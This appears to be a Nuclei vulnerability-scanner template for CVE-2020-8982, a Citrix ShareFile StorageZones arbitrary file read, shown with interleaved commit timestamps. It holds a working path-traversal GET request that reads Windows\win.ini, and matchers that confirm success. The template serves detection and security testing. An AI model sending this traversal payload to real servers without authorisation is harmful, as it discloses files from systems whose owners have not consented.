2021-01-02 04:56:15 +00:00
id : CVE-2020-8982
2020-07-03 17:56:16 +00:00
info :
name : Citrix ShareFile StorageZones Unauthenticated Arbitrary File Read
author : dwisiswant0
severity : high
2020-08-25 22:52:00 +00:00
description : An unauthenticated arbitrary file read issue exists in all versions of Citrix ShareFile StorageZones (aka storage zones) Controller, including the most recent 5.10.x releases as of May 2020.
2021-03-18 07:54:36 +00:00
tags : cve,cve2020,citrix,lfi
2021-03-16 15:06:22 +00:00
reference : https://support.citrix.com/article/CTX269106
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score : 7.50
cve-id : CVE-2020-8982
cwe-id : CWE-22
2020-07-03 17:56:16 +00:00
requests :
- method : GET
path :
- "{{BaseURL}}/XmlPeek.aspx?dt=\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\Windows\\\\win.ini&x=/validate.ashx?requri"
matchers-condition : and
matchers :
- type : status
status :
- 200
- type : word
words :
- "bit app support"
- "fonts"
- "extensions"
condition : and
2020-08-25 22:52:00 +00:00
part : body